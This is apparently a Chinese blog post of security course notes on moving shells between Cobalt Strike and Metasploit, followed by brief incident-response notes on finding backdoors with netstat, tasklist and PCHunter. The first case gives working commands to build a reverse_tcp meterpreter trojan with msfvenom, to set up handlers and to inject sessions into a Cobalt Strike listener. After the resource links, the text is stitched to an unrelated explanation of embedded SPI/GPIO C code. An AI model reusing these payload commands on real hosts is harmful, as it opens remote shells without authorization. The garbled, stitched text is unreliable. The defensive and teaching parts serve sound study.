p72 内网安全-域横向 CS&MSF 联动及应急响应初识

数据来源

演示案例

  • MSF&CobaltStrike 联动 Shell
  • WEB 攻击应急响应朔源-后门,日志
  • WIN 系统攻击应急响应朔源-后门,日志,流量
  • 临时给大家看看学的好的怎么干对应 CTF 比赛

案例1 - MSF&CobaltStrike联动Shell

CS下载与安装:cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客

环境准备:一台kali,一台靶机(我这里为了简单一点,就用两台虚拟机,你可以在远程服务器部署CS,然后kali中运行MSF(kail自带),最后在找一台靶机) 

CS->MSF

1)先配置cs

先使用CS创建一个监听器

随便使用个监听器生成木马并上线就好(使用那个监听器生成木马上线都行,只要能上线)

2)使用msf创建监听

我这里是在kali中重新打开一个终端(msf是kali自带的)

msfconsole                         # 启动 metasploita命令行
use exploit/multi/handler          # 使用模块
set payload windows/meterpreter/reverse_http      # 这里使用的攻击载荷要与CS监听器的相同(名字并不是完全相同,同样是windows的模块 然后最后的协议一样就好reverse_http)

set lhost 192.168.22.145         # 设置监听的ip,要与cs的监听器相同

set lport 6677                    # 端口也要与cs监听器端口保持一致
run                               # 启动模块

 

然后回到cs将后门的shell转发一个给msf 

 

大概等一分钟左右就上线了

MSF->CS

1)CS创建监听器 

 

2)使用msf拿到受害者的shell会话

要使用msf创建木马然后开启监听,再把木马复制到受害者主机中上线

生成木马

#                  攻击载荷                             监听ip       监听端口   demo999.exe(生成的文件名)         
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe

开启监听

msfconsole                                        # 启动 metasploita命令行
use exploit/multi/handler                         # 使用模块
set payload windows/x64/meterpreter/reverse_tcp   # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3                             # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址
set lport 9988                                    # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样
run                                               # 简单理解就是把鱼钩放到河里

到靶机中执行木马

监听msf的监听情况,成功拿到shell 

3)msf获取到shell会话后的操作

background退出会话,查看当前的sessions会话

 进入模块exploit/windows/local/payload_inject,查看需要设置的参数

use exploit/windows/local/payload_inject        # 进入模块
show options                                    # 查看设置

 

设置payload,这里的payload需要与cs处监听器设置的协议保持一致

set payload windows/meterpreter/reverse_http

show options查看并设置参数,设置端口,与cs处保持一致,设置lhost为cs服务器的ip地址,载入对应的session会话

set lport 17822              # 端口需要与cs监听器端口保持一致``
set lhost 192.168.1.3       # IP设置为msf本地IP,与CS设置保持一致``
set session 1               # 最开启查看的session的id就是1

run     # 最后运行攻击模块

 

 

案例2 - WEB攻击应急响应溯源-后门,日志

故事回顾:某客户反应自己的网站首页出现被篡改,请求支援

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

  • 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
  • 思路2:利用后门WebShell查杀脚本或工具找到对应后门文件,定位第一次时间分析
netstat -ano

站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。 

1)执行netstat -ano命令,通过开放的端口找到对应的PID。 

netstat -ano   # 查看本机开放的端口

2)执行tasklist -svc命令,通过PID找到对应的进程名称

tasklist /svc

 

3)在任务管理器,找到对应的进程

之后就可以停止服务并删除文件

4)也可以进行日志分析

p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客

p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客 

案例3 - Win系统攻击应急响应溯源-后门,日志,流量

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

故事回顾:某客户反应服务器异常出现卡顿等情况

思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量

获取进程监控:PCHunter64

 一般的木马是没有产商信息 

但是有些伪装的很好所以这个不能作为我们判断的唯一标准,可以再借助一些其他信息辅助我们进行判断 

远程ip

可以在目标主机的命令行查看端口信息 

# 查看本机端口开放信息
netstat -an

计划任务

系统用户名

还可以借助一些杀毒软件:腾讯、360、火绒这些

获取执行列表:UserAssistView

我感觉这个软件没有 PCHunter64 好用

  

涉及资源

  • https://www.onlinedown.net/soft/628964.htm
  • https://www.cnblogs.com/xiaozi/p/12679777.html
  • http://www.pc6.com/softview/SoftView_195167.html
  • https://github.com/EricZimmerman/AppCompatCacheParser/releases/
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
这段代码中包含了一些与SPI通信和GPIO操作相关的代码。下面我逐行解释每一部分的功能: ```c #ifdef USE_HANDSHAKE INTP_Init(1 << 0, INTP_RISING); INTP_Start(1 << 0); #endif ``` 这部分代码是一个条件编译,当定义了`USE_HANDSHAKE`宏时,会执行其中的代码。它初始化并启动外部中断INTP,当引脚0上的电平发生上升沿时触发中断。 ```c PORT->PMC7 &= ~(3<<1); // P71, P72 digital function PORT->PM7 &= ~(3<<1); // P71, P72 output mode PORT->P7 |= (3<<1); // P71/LED, P72/LED OFF ``` 这部分代码用于配置端口P71和P72的功能。它将P71和P72配置为数字功能,并将其设置为输出模式。最后,它将P71和P72引脚的输出状态设置为高电平,即关闭LED。 ```c #ifdef TEST_SPI_MODE_0 SPI_MasterInit(SPI_MODE_0); ``` 这部分代码也是一个条件编译,当定义了`TEST_SPI_MODE_0`宏时,会执行其中的代码。它初始化SPI主设备,并将SPI模式设置为模式0,即CPOL=0、CPHA=0。 ```c #ifdef USE_HANDSHAKE /* waiting slave ready */ while(g_intp0Taken == 0); g_intp0Taken = 0; #endif ``` 这部分代码也是一个条件编译,当定义了`USE_HANDSHAKE`宏时,会执行其中的代码。它在主设备发送数据之前等待从设备就绪。具体来说,它会不断检查一个标志位`g_intp0Taken`是否为0,直到从设备发出中断信号并将该标志位置为0。 ```c SPI_MasterSend(mtx_buf, sizeof(mtx_buf)); ``` 这行代码用于向SPI从设备发送数据。它将`mtx_buf`缓冲区的数据发送给从设备,并指定发送数据的长度。 ```c #ifdef SPI_WITH_DMA SysTick->CTRL &= ~SysTick_CTRL_TICKINT_Msk; /* Disable SysTick IRQ */ __WFI(); SysTick->CTRL |= SysTick_CTRL_TICKINT_Msk; /* Enable SysTick IRQ */ #else while(gp_spi_tx_address != 0); #endif ``` 这部分代码也是一个条件编译,当定义了`SPI_WITH_DMA`宏时,会执行其中的代码。如果使用DMA进行SPI传输,它会禁用SysTick中断,然后进入等待模式,等待DMA传输完成。如果没有使用DMA,则会检查一个指针变量`gp_spi_tx_address`是否为0,直到传输完成。 ```c delayMS(5); ``` 这行代码用于延时5毫秒。具体的延时函数实现可能在其他地方定义。 总的来说,这段代码的功能是进行SPI通信,并通过GPIO控制一些外设,还包括中断处理和延时等操作。具体的功能和实现可能与你的系统配置和应用有关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值